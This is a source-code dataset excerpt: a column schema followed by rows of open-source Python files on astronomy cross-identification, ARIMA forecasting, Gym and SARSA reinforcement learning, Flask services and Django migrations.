blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
281
content_id
stringlengths
40
40
detected_licenses
listlengths
0
57
license_type
stringclasses
2 values
repo_name
stringlengths
6
116
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
313 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
18.2k
668M
star_events_count
int64
0
102k
fork_events_count
int64
0
38.2k
gha_license_id
stringclasses
17 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
107 values
src_encoding
stringclasses
20 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
4
6.02M
extension
stringclasses
78 values
content
stringlengths
2
6.02M
authors
listlengths
1
1
author
stringlengths
0
175
c32bf021e2ce98be4bf6134e87dcca2f91a67cd7
f147835cba616d3e754c73230efea6d002ea8eba
/ATLAS-CDFS/scripts/print_cross_id_accuracies.py
03ccd78ad4d6eb4f92eb191757ab4e4db655c7b0
[ "MIT" ]
permissive
chengsoonong/crowdastro-projects
e301e4f712a83c7900eee936b1db32ef8fd16ccf
a80adf4764d09e003818cbc595f9c7eb3960df7b
refs/heads/master
2021-01-19T06:36:31.926527
2018-05-15T00:22:13
2018-05-15T00:22:13
65,180,559
0
0
null
null
null
null
UTF-8
Python
false
false
2,312
py
#!/usr/bin/env python3 """Output cross-identification accuracies. These are assessed against the RGZ & Norris intersection, on the Norris labels. Output: stdout Matthew Alger <[email protected]> Research School of Astronomy and Astrophysics The Australian National University 2017 """ import astropy.io.ascii import pipeline def main(): swire_names, swire_coords, _ = pipeline.generate_swire_features(overwrite=False) swire_labels = pipeline.generate_swire_labels(swire_names, swire_coords, overwrite=False) (_, atlas_test_sets), (_, swire_test_sets) = pipeline.generate_data_sets(swire_coords, swire_labels, overwrite=False) cids = list(pipeline.cross_identify_all(swire_names, swire_coords, swire_labels, swire_test_sets, swire_labels[:, 0], field='cdfs')) table = astropy.io.ascii.read(pipeline.TABLE_PATH) atlas_to_swire_norris = {} key_to_atlas = {} for row in table: name = row['Component Name (Franzen)'] key_to_atlas[row['Key']] = name swire = row['Source SWIRE (Norris)'] if not swire or not swire.startswith('SWIRE') or not name: continue atlas_to_swire_norris[name] = swire print('Labeller\tClassifier\tQuadrant\tDataset\tn_correct\tn_total\tn_skipped\tAccuracy') for cid in cids: atlas_to_swire_predictor = dict(zip(cid.radio_names, cid.ir_names)) # For each ATLAS object in RGZ & Norris... atlas_keys = atlas_test_sets[:, pipeline.SET_NAMES['RGZ & Norris'], cid.quadrant].nonzero()[0] n_total = 0 n_correct = 0 n_skipped = 0 for i in atlas_keys: name = key_to_atlas[i] if name not in atlas_to_swire_norris: n_skipped += 1 continue if name not in atlas_to_swire_predictor: n_skipped += 1 continue swire_norris = atlas_to_swire_norris[name] swire_predictor = atlas_to_swire_predictor[name] n_correct += swire_norris == swire_predictor n_total += 1 print(cid.labeller, cid.classifier, cid.quadrant, '{:<20}'.format(cid.dataset_name), n_correct, n_total, n_skipped, '{:.02%}'.format(n_correct / n_total), sep='\t') if __name__ == '__main__': main()
70a9392a3f153d8f770b23044ec2533f41dc3a2f
c4e3f8ba5ddadcdb8f6cd818623745951318a8d9
/Arima_smape.py
b092a690a460877f73ec5cbcae499a9f165f3076
[]
no_license
wangningjun/ARIMA_time_serise
8a70e55a14399d1bb435180656ab2e0336224248
8eb526feac394e4043be7467b1407b80095e3df4
refs/heads/master
2020-03-26T13:59:12.343731
2018-10-12T03:08:30
2018-10-12T03:08:30
144,965,956
2
0
null
null
null
null
UTF-8
Python
false
false
5,201
py
import pandas as pd import numpy as np import matplotlib.pylab as plt from statsmodels.tsa.arima_model import ARIMA import os from pandas.core.frame import DataFrame from sys import maxsize ''' 更新日期:2018/8/28 说明:本脚本的内容是以ARIMA算法预测时间序列 更新说明:实现动态调参 准确预测未来n时刻的数据,统计smape ''' def difference(dataset, interval=1): diff = list() for i in range(interval, len(dataset)): value = dataset[i] - dataset[i - interval] diff.append(value) return np.array(diff) # invert differenced value def inverse_difference(history, yhat, interval=1): return yhat + history[-interval] def Arima_up(x): differenced = difference(x, days_up) _, p, q, _ = proper_model(differenced,3) print(p,q) model = ARIMA(differenced, order=(p, 0, q)) ARIMA_model = model.fit(disp=0) return ARIMA_model def Arima_down(x): differenced = difference(x, days_down) _,p,q,_ = proper_model(differenced,3) print(p,q) model = ARIMA(differenced, order=(p, 0, q)) ARIMA_model = model.fit(disp=0) return ARIMA_model def predict(X,model,days): # 在训练的时间段内,predict和fittedvalues的效果一样,不同的是predict可以往后预测 differenced = difference(X, days) start_index = len(differenced) end_index = len(differenced) + predict_long forecast = model.predict(start=int(start_index), end=int(end_index)) history = [x for x in X] # plt.plot(history, color='red', label='predict_data') for yhat in forecast: inverted = inverse_difference(history, yhat, days) if inverted<0: # 预测出来小于0的值全都填为0 inverted = 0 history.append(inverted) return history def show(predict,realy): plt.figure(figsize=(8, 4)) plt.subplot(2, 1, 1) plt.plot(predict, color='red', label='predict') plt.subplot(2, 1, 2) plt.plot(realy, color='red', label='realy') plt.show() def show_double(predict,realy): plt.figure(figsize=(8, 4)) plt.subplot(2, 1, 1) plt.plot(predict, color='red', label='predict') plt.subplot(2, 1, 2) plt.plot(realy, color='blue', label='realy') plt.show() def proper_model(data_ts, maxLag): init_bic = maxsize init_p = 0 init_q = 0 init_properModel = None for p in np.arange(maxLag): for q in np.arange(maxLag): model = ARIMA(data_ts, order=(p,0,q)) try: results_ARIMA = model.fit(disp=-1) except: continue bic = results_ARIMA.bic if bic < init_bic: init_p = p init_q = q init_properModel = results_ARIMA init_bic = bic return init_bic, init_p, init_q, init_properModel ''' if __name__ == '__main__': days_up = 24 days_down = 24 predict_long = 29 path_in = 'data/in/outdata/' # 文件夹路径 path_out = 'data/out/' count = 0 for file in os.listdir(path_in): df = open(path_in + file, 'rb') # file data = pd.read_csv(df, header=None) data.columns = ['time', 'up', 'down'] # data = pd.read_csv(df) # 存在抬头的情况 len_data = len(data) data_ = data.head(len_data-(predict_long+1)) # 除去最后三十行 都要 if len(data_) < predict_long: continue X1 = data_['up'] X2 = data_['down'] try: model_up = Arima_up(X1) except: continue # try: # model_down = Arima_down(X2) # except: # continue results_pre_up = predict(X1, model_up, days_up) # results_pre_down = predict(X2, model_down, days_down) count += 1 real_up = data['up'].tail(predict_long+1) real_down = data['down'].tail(predict_long+1) pre_up_long = np.array(results_pre_up[-(predict_long+1):]) show(pre_up_long, real_up) # 展示预测的三十天和真实的三十天 smape_up = sum(abs( pre_up_long- real_up.values)/(pre_up_long+real_up.values))/(predict_long+1)*2 # smape_down = sum(abs(results_pre_down-real_down.values)/(results_pre_down+real_down.values))/len(results_pre_down)*2 print(smape_up) ''' if __name__ == '__main__': days_up = 24 days_down = 24 predict_long = 29 path_in = 'data/in/data/' # 文件夹路径 path_out = 'data/out/' for file in os.listdir(path_in): df = open(path_in + file, 'rb') # file # data = pd.read_csv(df, header=None) # data.columns = ['time', 'up', 'down'] data = pd.read_csv(df) # 存在抬头的情况 real_up = data['down'][-days_down*2:-days_down] pre_up = data['down'].tail(days_up) show(real_up, pre_up) # 展示预测的24天和真实的24天 real_up = real_up.values pre_up = np.array(pre_up.values) smape_up = sum(abs(real_up- pre_up)/(real_up+pre_up))/(days_up)*2 print(smape_up) # smape_down = sum(abs(results_pre_down-real_down.values)/(results_pre_down+real_down.values))/len(results_pre_down)*2
334772388d96c3e0ad4ac2d3e821f92425e6ed27
8cbd6648596a78a6ab62bf2201eb7a93d608c59a
/visualization.py
81e4019b045bf9351e4509748dc31a8c599afd95
[]
no_license
chengeaa/researchscripts
a1a1a6f6af900bca3cd8fdf68585d14dce88e8e2
f677b1c515e4406dcf1b046f11b704b64d0dc2ce
refs/heads/master
2022-05-16T23:59:42.984438
2022-05-10T02:35:32
2022-05-10T02:35:32
196,303,412
1
0
null
null
null
null
UTF-8
Python
false
false
4,198
py
#imports #base import os import re #ase from ase.io import vasp, gen from ase.visualize.plot import plot_atoms from ase.visualize import view #scipy import pandas as pd import numpy as np import matplotlib matplotlib.use('TkAgg') import matplotlib.pyplot as plt #functions def show_atoms_grid(data, rotation = '-0x,0y,0z', save= False, filename = 'grid_configs'): ''' Where data is list of Atoms objects ''' dim = int(np.ceil(np.sqrt(len(data)))) fig, axarr = plt.subplots(dim, dim, figsize=(25, 25)) for i, config in enumerate(data): plot_atoms(config, axarr[i%dim,i//dim], rotation = rotation) if save: fig.savefig(filename + ".png") def viewStructs(name, directory, kind = 'gen'): """ View collection of structures as a "trajectory" Args: - name (str): substring unique to structures (.gen, POSCAR, slab, etc) - directory (str): Directory where the structures live - kind: kind of output froim list of (vasp, gen) Opens viewer with loaded trajectory (if remote, need X server) """ geometries = [] files = os.listdir(directory) if kind == 'gen': pattern = r"{}.*.gen".format(name) elif kind == 'vasp': pattern = r"{}".format(name) else: raise ValueError("file kind must be from (vasp, gen)") for i in files: key = re.search(pattern, i) if key: if kind == 'gen': geometries += [gen.read_gen(directory + i)] elif kind == 'vasp': geometries += [vasp.read_vasp(directory + i)] else: raise ValueError("file kind must be from (vasp, gen)") view(geometries) def plotElemDist(data, targetElem = "C", latticeElems = ["Si", "N", "H"], nbins = 25, stacked = False): """ Plot distribution of element within slab, data should be arraylike collection of stuctures """ targetZs = [] latticeZs = [] # populate a cZs list of hists, latticeZs list of hists for key, value in data.iteritems(): targetZs += [atom.position[2] for atom in value if atom.symbol == targetElem] latticeZs += [atom.position[2] for atom in value if atom.symbol in latticeElems] minZ, maxZ = np.min(latticeZs), np.max(latticeZs) bins = np.linspace(minZ, maxZ, nbins) width = (maxZ-minZ)/nbins if stacked: h = plt.hist([targetZs, latticeZs], bins = bins, density = True, alpha = 1, label = "stacked {} and {} distributions".format(targetElem, latticeElems), stacked = True) plt.vlines([minZ, maxZ], 0, np.max(h[:1]), label = "min and max Z positions") else: h1 = plt.hist(targetZs, bins = bins, density = True, alpha = 0.8, label = "{} distribution".format(targetElem)) h2 = plt.hist(latticeZs, bins = bins, density = True, alpha = 0.2, label = "{} distribution".format(latticeElems)) plt.vlines([minZ, maxZ], 0, np.max([h1[:1], h2[:1]]), label = "min and max Z positions") plt.legend() plt.show() def getabBondcountStructure(data, idx, element): """ Gets a struture with 'charges' equal to nbonds between a (fixed) and b(``element``) data needs geom, coordlabels, and (optionally) wantedIndices columns geom is Atoms object of structure coordlabels is a raw output from the coordlabeller function (relcoords and raw bonds) element is desired secondary element (primary element determined by input) Calls view() on resulting geometry Returns the structure """ coordlabels = data.loc[idx, 'coordlabels'] geometry = data.loc[idx, 'geom'] if 'wantedIndices' in data: indices = data.loc[idx, 'wantedIndices'] else: indices = np.arange(len(geometry)) bondcounts = {key: np.sum( np.array([geometry[i].symbol for i in value]) == element ) for key, value in pd.Series(coordlabels[1])[indices].items() } charges = [0] * len(geometry) for i in range(len(charges)): charges[i] = bondcounts.get(i, -1) geometry.set_initial_charges(charges) view(geometry) return geometry
459e8127e4b5cb873a598644dc79c3d2708b3db1
a9c0a8d815b6453aca945849f3b402f75684bfcb
/project/api/services.py
95d316eb964a262ab8aa954303e31d09a23b1d26
[]
no_license
harrywang/my-flask-tdd-docker
4035b666a3366cd059a3a65c68c7c9ad9b637da3
362c33e7caa3bf35a62cff71f3c567c5e8de1fd2
refs/heads/master
2022-04-13T23:12:04.725775
2020-03-21T18:14:00
2020-03-21T18:14:00
248,801,429
0
0
null
null
null
null
UTF-8
Python
false
false
679
py
# project/api/services.py from project import db from project.api.models import User def get_all_users(): return User.query.all() def get_user_by_id(user_id): return User.query.filter_by(id=user_id).first() def get_user_by_email(email): return User.query.filter_by(email=email).first() def add_user(username, email): user = User(username=username, email=email) db.session.add(user) db.session.commit() return user def update_user(user, username, email): user.username = username user.email = email db.session.commit() return user def delete_user(user): db.session.delete(user) db.session.commit() return user
4d13e0d0441d354c7a3d8a30341ba2bba0ab8788
727f30fac793e3812dbbed318826520f907a7d7f
/setup.py
3c70f9feb5005dc7f121d12c70310abca05ea3d5
[]
no_license
jaredwilli/cssprefixer
f4889bd81b9d7d011d6cda1e052bd62413fa9356
b5e24fc3a11822b6c964c1fb48a31c02d79a95fe
refs/heads/master
2021-01-16T19:40:59.486971
2011-03-25T13:00:30
2011-03-25T13:00:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
928
py
#!/usr/bin/env python #import sys from distutils.core import setup # if sys.version < '2.5': # sys.exit('Python 2.5 or higher is required') setup(name='cssprefixer', version='1.3', description="A tool that rewrites your CSS files, adding vendor-prefixed versions of CSS3 rules.", # long_description="""""", license='Apache License 2.0', author='myfreeweb', author_email='[email protected]', url='http://github.com/myfreeweb/cssprefixer', packages=['cssprefixer'], scripts=['scripts/cssprefixer'], keywords=['CSS', 'Cascading Style Sheets'], classifiers = [ 'Environment :: Web Environment', 'Intended Audience :: Developers', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Software Development :: Libraries', ], package_data={}, )
5a60d55d408bfb0329da3b0de1b835b729d6aea1
be81eadfe934f3bc12a214e833e375520679b4ca
/src/lib/envs/envGym.py
254f455d9a821bd035c15718f4e986c5a5aba1d2
[ "MIT" ]
permissive
sankhaMukherjee/RLalgos
2bbbabef68ad3bba2d21bc5e5c537db39dbca967
80d19a39af29947db2fc73b0443b9c3bb66d6fc0
refs/heads/master
2022-12-11T14:44:53.946306
2019-06-05T10:10:38
2019-06-05T10:10:38
164,218,142
0
0
MIT
2022-12-08T04:50:46
2019-01-05T13:38:03
Jupyter Notebook
UTF-8
Python
false
false
15,876
py
import gym, sys import numpy as np from collections import deque import itertools as it class Env: '''A convinience function for generating episodes and memories This convinience class generates a context manager that can be used for generating a Gym environment. This is supposed to be a drop-in replacement for the Unity environment. This however differs from the Unity environment in that it needs the name of the environment as input. The other difference is that there is no such thing as `trainMode`. ''' def __init__(self, envName, showEnv=False): '''Initialize the environment This sets up the requirements that will later be used for generating the gym Environment. The gym environment can be used in a mode that hides the plotting of the actuual environment. This may result in a significant boost in speed. Arguments: envName {str} -- The name of the environment to be generated. This shoould be a valid name. In case the namme provided is not a valid name, this is going to exis with an error. Keyword Arguments: showEnv {bool} -- Set this to ``True`` if you want to view the environment (default: {False}) ''' try: self.no_graphics = not showEnv self.envName = envName self.states = None except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.__init__ - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return def __enter__(self): '''generate a context manager This will actually generate the context manager and allow you use this within a ``with`` statement. This is the function that actually initialized the environment and maintains it, until it is needed. The idea of multiplel agents within the gym enviroonments doesnt exists as it does in the Unity agents. However, we shall incoroporoate this idea within the gym environment so that a signgle action can takke place. Returns: ``this`` -- Returns an instance of the same class ''' try: self.env = gym.make(self.envName) self.state = self.env.reset() except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.__enter__ - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return self def reset(self): '''reset the environment before starting an episode Returns: status -- The current status after the reset ''' try: self.state = self.env.reset() except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.reset - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return self.states def step(self, policy): '''advance one step by taking an action This function takes a policy function and generates an action according to that particular policy. This results in the advancement of the episode into a one step with the return of the reward, and the next state along with any done information. Arguments: policy {function} -- This function takes a state vector and returns an action vector. It is assumed that the policy is the correct type of policy, and is capable if taking the right returning the right type of vector corresponding the the policy for the current environment. It does not check for the validity of the policy function Returns: list -- This returns a list of tuples containing the tuple ``(s_t, a_t, r_{t+1}, s_{t+1}, d)``. One tuple for each agent. Even for the case of a single agent, this is going to return a list of states ''' try: results = [] states = np.array([self.state]) action = policy(states)[0].cpu().detach().numpy() #print('A'*30, action, self.env.env.action_space.sample(), self.env.env.action_space) if type(self.env.env.action_space.sample()) == int: action = int(action[0]) nextState, reward, done, info = self.env.step(action) results.append((self.state, action, reward, nextState, done)) self.state = nextState except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.step - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return results def episode(self, policy, maxSteps=None): '''generate data for an entire episode This function generates an entire episde. It plays the environment by first resetting it too the beginning, and then playing the game for a given number of steps (or unless the game is terminated). It generates a set of list of tuplees, again one for each agent. Rememebr that even when the number of agents is 1, it will still return a list oof states. Arguments: policy {function} -- The function that takes the current state and returns the action vector. Keyword Arguments: maxSteps {int or None} -- The maximum number of steps that the agent is going to play the episode before the episode is terminated. (default: {None} in which case the episode will continue until it actually finishes) Returns: list -- This returns the list of tuples for the entire episode. Again, this is a lsit of lists, one for each agent. ''' try: self.reset() stepCount = 0 allResults = [[] for _ in range(1)] # One for each agent. while True: stepCount += 1 result = self.step(policy)[0] if not self.no_graphics: self.env.render() state, action, reward, next_state, done = result allResults[0].append(result) if done: break if (maxSteps is not None) and (stepCount >= maxSteps): break except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.episode - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return allResults def __exit__(self, exc, value, traceback): '''Exit the context manager The exit funciton that will result in exiting the context manager. Typically one is supposed to check the error if any at this point. This will be handled at a higher level Arguments: *args {[type]} -- [description] ''' if not exec: self.env.close() return True class Env1D: '''A convinience function for generating episodes and memories This convinience class generates a context manager that can be used for generating a Gym environment. This is supposed to be a drop-in replacement for the Unity environment. This however differs from the Unity environment in that it needs the name of the environment as input. The other difference is that there is no such thing as `trainMode`. This 1D environment is designed to takke 1D state vector and use this vector in its calculations. If you are using a 1D environment you are advised to use this. This environment has the added advantage that it will automatically stack together ``N`` previous states into a single state. Note that the first state will be copied ``N`` times, rather than zero padding as this seems a more natural state for the beginning. ''' def __init__(self, envName, N=1, showEnv=False): '''Initialize the environment This sets up the requirements that will later be used for generating the gym Environment. The gym environment can be used in a mode that hides the plotting of the actuual environment. This may result in a significant boost in speed. Arguments: envName {str} -- The name of the environment to be generated. This shoould be a valid name. In case the namme provided is not a valid name, this is going to exis with an error. Keyword Arguments: N {integer} -- Set this to the number of states that you wish to have that will be concatenated together. (default: 1). You will not be able to set a value less than 1. showEnv {bool} -- Set this to ``True`` if you want to view the environment (default: {False}) ''' try: self.N = N self.no_graphics = not showEnv self.envName = envName self.states = None assert type(self.N) == int, f'integer expected. Received {type(self.N)}' assert self.N > 0, f'self.N = {self.N} (should be greater than 0)' except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.__init__ - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return def __enter__(self): '''generate a context manager This will actually generate the context manager and allow you use this within a ``with`` statement. This is the function that actually initialized the environment and maintains it, until it is needed. The idea of multiplel agents within the gym enviroonments doesnt exists as it does in the Unity agents. However, we shall incoroporoate this idea within the gym environment so that a signgle action can takke place. Returns: ``this`` -- Returns an instance of the same class ''' try: self.env = gym.make(self.envName) state = self.env.reset() self.state = deque([state for i in range(self.N+1)], maxlen=self.N+1) except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.__enter__ - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return self def reset(self): '''reset the environment before starting an episode Returns: status -- The current status after the reset ''' try: state = self.env.reset() self.state = deque([state for i in range(self.N+1)], maxlen=self.N+1) except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.reset - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return self.states def step(self, policy): '''advance one step by taking an action This function takes a policy function and generates an action according to that particular policy. This results in the advancement of the episode into a one step with the return of the reward, and the next state along with any done information. Arguments: policy {function} -- This function takes a state vector and returns an action vector. It is assumed that the policy is the correct type of policy, and is capable if taking the right returning the right type of vector corresponding the the policy for the current environment. It does not check for the validity of the policy function Returns: list -- This returns a list of tuples containing the tuple ``(s_t, a_t, r_{t+1}, s_{t+1}, d)``. One tuple for each agent. Even for the case of a single agent, this is going to return a list of states ''' try: results = [] state = np.array(list(it.islice(self.state, 1, 1+self.N))) state = state.flatten() states = np.array([state]) action = policy(states)[0].cpu().detach().numpy() #print('A'*30, action, self.env.env.action_space.sample(), self.env.env.action_space) if type(self.env.env.action_space.sample()) == int: action = int(action[0]) nextState, reward, done, info = self.env.step(action) self.state.append(nextState) nextState = np.array(list(it.islice(self.state, 1, 1+self.N))) nextState = nextState.flatten() results.append((state, action, reward, nextState, done)) except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.step - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return results def episode(self, policy, maxSteps=None): '''generate data for an entire episode This function generates an entire episde. It plays the environment by first resetting it too the beginning, and then playing the game for a given number of steps (or unless the game is terminated). It generates a set of list of tuplees, again one for each agent. Rememebr that even when the number of agents is 1, it will still return a list oof states. Arguments: policy {function} -- The function that takes the current state and returns the action vector. Keyword Arguments: maxSteps {int or None} -- The maximum number of steps that the agent is going to play the episode before the episode is terminated. (default: {None} in which case the episode will continue until it actually finishes) Returns: list -- This returns the list of tuples for the entire episode. Again, this is a lsit of lists, one for each agent. ''' try: self.reset() stepCount = 0 allResults = [[] for _ in range(1)] # One for each agent. while True: stepCount += 1 result = self.step(policy)[0] if not self.no_graphics: self.env.render() state, action, reward, next_state, done = result allResults[0].append(result) if done: break if (maxSteps is not None) and (stepCount >= maxSteps): break except Exception as e: raise type(e)( 'lib.envs.envUnity.Env.episode - ERROR - ' + str(e) ).with_traceback(sys.exc_info()[2]) return allResults def __exit__(self, exc, value, traceback): '''Exit the context manager The exit funciton that will result in exiting the context manager. Typically one is supposed to check the error if any at this point. This will be handled at a higher level Arguments: *args {[type]} -- [description] ''' if not exec: self.env.close() return True
6b10d9a5295db113b96722c8b92c968c83079333
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
/Python OOP/Decorators-Exercise/Cache.py
3630fbd6868ddb28d50316c5fea622d51b440ae5
[]
no_license
Ivaylo-Atanasov93/The-Learning-Process
71db22cd79f6d961b9852f140f4285ef7820dd80
354844e2c686335345f6a54b3af86b78541ed3f3
refs/heads/master
2023-03-30T20:59:34.304207
2021-03-29T15:23:05
2021-03-29T15:23:05
294,181,544
0
0
null
null
null
null
UTF-8
Python
false
false
346
py
def cache(func): def wrapper(n): result = func(n) wrapper.log[n] = result return result wrapper.log = {} return wrapper @cache def fibonacci(n): if n < 2: return n else: return fibonacci(n - 1) + fibonacci(n - 2) fibonacci(3) print(fibonacci.log) fibonacci(4) print(fibonacci.log)
5edb0c8e55ee71407031f5baea3676bd34bf5368
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
/tracpro/polls/migrations/0015_issue_region.py
ff1c2937af89c2c8ce646673002fd58356fd1f04
[ "BSD-3-Clause" ]
permissive
rapidpro/tracpro
0c68443d208cb60cbb3b2077977786f7e81ce742
a68a782a7ff9bb0ccee85368132d8847c280fea3
refs/heads/develop
2021-01-19T10:29:48.381533
2018-03-13T12:17:11
2018-03-13T12:17:11
29,589,268
5
10
BSD-3-Clause
2018-02-23T14:43:12
2015-01-21T12:51:24
Python
UTF-8
Python
false
false
575
py
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('groups', '0004_auto_20150123_0909'), ('polls', '0014_remove_response_is_complete'), ] operations = [ migrations.AddField( model_name='issue', name='region', field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True), preserve_default=True, ), ]
dedc1e2d4474ac95a338056cb6ee689645ed4e0c
3607629e732c37f40231fe4c83e73ac087ed3fcf
/poc-todo/POC/APP/Task/migrations/0004_remove_usertasks_first_name.py
08ca53373c7ef5acfe15379664dd64b1b080bddd
[]
no_license
gout-tech/apis_cusat_connect
3d71f73a620b7fa489671f45cbce7cc7b6972f80
fd7114480592e81ead6e2efe932504629c2ff696
refs/heads/master
2022-05-29T14:10:10.326086
2020-02-25T04:18:38
2020-02-25T04:18:38
242,907,961
0
0
null
2022-04-22T23:06:17
2020-02-25T04:17:32
Python
UTF-8
Python
false
false
334
py
# Generated by Django 2.2.1 on 2019-08-12 13:16 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('Task', '0003_usertasks_first_name'), ] operations = [ migrations.RemoveField( model_name='usertasks', name='first_name', ), ]
cc949b9bcca51c5132a50e65d667fc6a78d82a30
892c6d9ca3160b151a620c638ea7295be8bdc7e8
/NarrowDoor/sarsa.py
32b731b6118a9aa6ad1f97204bae34872b055ccc
[]
no_license
CuiBen/RL
22e89295a60f6a18a86f0d3cc7005cda3153567f
dabb2fe5af7e80e5b0dea96fc00863a218a81868
refs/heads/master
2021-10-27T13:35:55.984338
2019-04-17T10:33:12
2019-04-17T10:33:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,851
py
#!/usr/bin/env python # -*- coding: UTF-8 -*- """ SARSA algorithm """ import random import config class RL: def __init__(self, actions=config.valid_actions, epsilon=config.epsilon, alpha=config.alpha, gamma=config.gamma): self.q = {} # store Q values self.actions = actions # valid actions set self.epsilon = epsilon # exploration constant of epsilon-greedy algorithm self.alpha = alpha # discount constant self.gamma = gamma # learning rate def getQ(self, state, action): # get Q value return self.q.get((state, action), 0.0) def chooseAction(self, state): # get action using epsilon-greedy algorithm if random.random() < self.epsilon: action = random.choice(self.actions) else: q = [self.getQ(state,a) for a in self.actions] maxQ = max(q) count = q.count(maxQ) # in case there're several state-action max values, we select a random one among them if count > 1: best = [i for i in range(len(self.actions)) if q[i] == maxQ] i = random.choice(best) else: i = q.index(maxQ) action = self.actions[i] return action, None # after choosing action, the agent needs to interact with the environment to get reward and the new state # and SARSA also needs to get the new action, then it can update Q value def learn(self, last_state, last_action, reward, new_state, new_action): ''' SARSA: Q(s, a) += alpha * (reward(s,a) + gamma * Q(s') - Q(s,a)) ''' oldq = self.getQ(last_state, last_action) q_ = self.getQ(new_state, new_action) self.q[(last_state, last_action)] = oldq + self.alpha * (reward + self.gamma * q_ - oldq)
f9a7397aba99d47d53fd78c5c0b097fe73bfd768
fbb1550dc5437d672ed0137bd7711eba3290dee3
/students/Luyao_Xu/lesson01/activity/calculator/subtracter.py
328933552f5932496f2d61a3f2eb8b8bb3a1c036
[]
no_license
JavaRod/SP_Python220B_2019
2cc379daf5290f366cf92dc317b9cf68e450c1b3
5dac60f39e3909ff05b26721d602ed20f14d6be3
refs/heads/master
2022-12-27T00:14:03.097659
2020-09-27T19:31:12
2020-09-27T19:31:12
272,602,608
1
0
null
2020-06-16T03:41:14
2020-06-16T03:41:13
null
UTF-8
Python
false
false
110
py
class Subtracter: @staticmethod def calc(operand_1, operand_2): return operand_1 - operand_2
7e570e566dfc9f119522d2a9b25ab1a0c88d59c7
819d617a3aca8d42e19b5c934436b054cd0313c4
/dofus/home/migrations/0004_auto_20200215_1438.py
b38dab3c685ae2131c060b171713647a160aadad
[]
no_license
MaelLhostis/dofus
55032034f381a3072aa08f7243ca6584ef2a26f4
b70991c12a2708cc6fc53a840d0d3969bf5e211e
refs/heads/master
2022-06-28T18:27:40.958251
2020-02-20T22:17:17
2020-02-20T22:17:17
240,575,643
0
0
null
2022-05-25T05:00:35
2020-02-14T18:39:15
Python
UTF-8
Python
false
false
360
py
# Generated by Django 3.0.3 on 2020-02-15 14:38 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('home', '0003_auto_20200215_1428'), ] operations = [ migrations.DeleteModel( name='Pvpm', ), migrations.DeleteModel( name='Server', ), ]
f999bc0811f3d15a0bf554e32cd623a97861a497
f9b047b25184787af88fd151f2a6226b6b342954
/investmentTornadoServer/server/corpora.py
6d0570a7cfa8308f2e0cc773ff1adf8306bb5b7b
[]
no_license
CallMeJiaGu/TonrnadoRecomendServer
4bfc3dd6d6a432321f80b12d66bb424fbc1a0911
54bb21191b16da27c20ce64ab14762bc777e30ca
refs/heads/master
2020-03-23T19:31:43.291995
2019-07-04T03:04:58
2019-07-04T03:04:58
141,984,920
8
3
null
null
null
null
UTF-8
Python
false
false
2,210
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (C) 2017 Wu Yuanchao <[email protected]> import logConfig import logging import os import codecs logger = logging.getLogger() class CorporaWithTitle(): def __init__(self, cutedfile): self.f = cutedfile def __iter__(self): with codecs.open(self.f, 'r', 'utf-8') as f: for line in f: cols = line.strip().lower().split(' ') yield cols[0], cols[1:] class CorporaWithoutTitle(): def __init__(self, cuted_file): self.f = cuted_file def __iter__(self): with codecs.open(self.f, 'r', 'utf-8') as f: for line in f: cols = line.strip().lower().split(' ') yield cols[1:] class CorporaCut(): def __init__(self, rawfile, cuttor): self.rawfile = rawfile self.cuttor = cuttor def __iter__(self): with codecs.open(self.rawfile, 'r', 'utf-8') as f: for i, line in enumerate(f): cols = line.strip().split(',') title, content = cols[0].strip().lower(), u' '.join(cols[1:]).lower() tokens = self.cuttor.fltcut(content) if len(tokens) > 0: yield title.encode('utf8'), tokens else: logger.warn('line %d skiped' % i) def process_rawcorpora(rawfile, target, cuttor): cuted_corpora = CorporaCut(rawfile, cuttor) with codecs.open(target, 'w', 'utf-8') as f: for title, tokens in cuted_corpora: try: f.write(title + ' ' + u' '.join(tokens) + os.linesep) except Exception, e: logger.error((title, tokens, e)) def load_words(dirname): words = set() for fname in os.listdir(dirname): print('load from ' + fname) for line in codecs.open(os.path.join(dirname, fname), 'r', 'utf-8'): for w in set(line.strip().split()): words.add(w) return words if __name__ == '__main__': from mycut import FilterCut cuttor = FilterCut() r = './test/raw/paper_error.txt' t = './test/cut/test.txt' process_rawcorpora(r, t, cuttor)
f61d5bf47b249e42e2a299759024a7e7c45c8f34
baf468b02b6fb58a1f88ce38dde46a183722a489
/data.py
5218f7a1dbba2b3ea3dfcd5a12a784c126a1c1f5
[]
no_license
